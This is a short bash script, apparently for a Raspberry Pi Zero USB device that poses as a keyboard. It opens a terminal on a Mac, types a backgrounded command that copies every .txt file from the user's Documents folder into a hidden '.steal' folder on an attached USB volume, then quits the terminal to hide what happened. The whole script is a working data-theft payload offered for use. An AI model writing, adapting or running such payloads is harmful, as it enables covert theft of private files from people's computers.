#!/usr/bin/env bash
/usr/local/pi0usbbox/macos/openterm
# assume partition label name is 'ChisDisk'
hid-print 'nohup cp -r ~/Documents/*.txt /Volumes/ChisDisk/.steal 2>&1 >/dev/null &'
hid-sendkeys enter
sleep 0.1
hid-sendkeys left-meta q